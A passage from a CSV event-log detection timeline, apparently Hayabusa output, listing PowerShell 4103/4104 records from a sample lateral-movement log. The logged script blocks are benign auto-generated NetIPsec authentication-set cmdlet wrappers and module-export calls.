(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.515 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.515 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.518 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.520 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.520 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.520 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.521 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.523 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 